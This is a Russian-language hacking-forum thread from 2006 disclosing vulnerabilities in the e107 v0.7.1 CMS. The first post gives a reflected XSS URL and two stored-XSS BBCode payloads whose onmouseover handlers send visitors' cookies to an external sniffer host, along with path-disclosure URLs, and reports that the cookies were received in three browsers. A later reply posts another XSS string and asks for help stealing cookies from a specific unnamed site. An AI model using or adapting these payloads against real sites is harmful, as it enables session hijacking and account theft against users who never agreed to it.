ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Многочисленные уязвимости e107 v0.7.1 RE
  #1  
Старый 11.05.2006, 00:07
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
Lightbulb Многочисленные уязвимости e107 v0.7.1 RE

Многочисленные уязвимости e107 v0.7.1 RE
_http://e107.ru/


1. Пасивная XSS

Цитата:
_http://e107.ru/news.php/<script>alert(document.cookies)</script>
Толку от неё мало, но вдруг кому-нибудь понадобится

2. Активные XSS

Здесь всё более серьёзно...
Итак, уязвимы bb теги, фильтруется символ < и иногда ", остальное пропускается.

а)
Цитата:
[size=22px' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' ]xss[/size]
На выходе получаем:

PHP код:
<span style='font-size:22px' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' px'>xss</span> 
Как только жертва проводит мышкой по ссылке, cookies отправляются на ваш сниффер.

б)
Цитата:
[img*]http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = "http://site.ru/cgi-bin/s.jpg?"+document.cookie;' [/img*]
* - убрать
На выходе получаем:

PHP код:
<img src='http://www.lifecity.us/phpBB2/images/smiles/icon_smile.gif' onmouseover='img = new Image(); img.src = 'http://site.ru/cgi-bin/s.jpg?'+document.cookie;' ' class='bbcode' alt='' style='vertical-align:middle; border:0'  /> 
Как только жертва проводит мышкой по картинке, cookies отправляются на ваш сниффер.

Эти bb теги используются для написания сообщений на форуме, и изменения данных в профиле.
Все было проверено мной на: IE 7 Beta, Opera 8.54 и Firefox 1.5.0.3, все cookies пришли

3. Раскрытие пути

На закуску

_http://e107.ru/e107_plugins/content/plugin.php
_http://e107.ru/e107_plugins/list_new/plugin.php

Их очень много, в основном в файлах, находящихся в папке e107_plugins.


Antichat.ru © VectorG
 
Ответить с цитированием

  #2  
Старый 11.05.2006, 09:05
Аватар для Tem
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Ну и ешё пару листингов _http://e107.ru/e107_plugins/poll/
 
Ответить с цитированием

  #3  
Старый 08.08.2007, 08:16
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Народ помогите плиииз!!!!!!!!!!!
Кароче я один сайт поиметь хотел... там стоит форум системы e107, я нашёл там XCC:
Код:
</textarea>'"><script>alert(document.cookie)</script>
Правда она работает лишь при нажатии на кнопку "Просмотр", сайт к сожалению назвать не смогу....
В общем как мне грамотно фрейм составить??? я не знаю как мне сделать пост запрос... там нету таких вещей как &, а юзаются точки... скорее там с помощью js пост запрос передаётся.... Но я думаю можно как то с помощью данной ХСС куки тянуть...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Многочисленные уязвимости Danneo CMS vectorg Уязвимости 2 23.04.2006 16:38
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Действующие уязвимости почтовых систем РФ Maxmen E-Mail 16 12.12.2004 16:48
Взлом wmshop Xalegi Уязвимости 0 29.11.2004 01:44
Вопрос про уязвимости в exbb Форумы 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ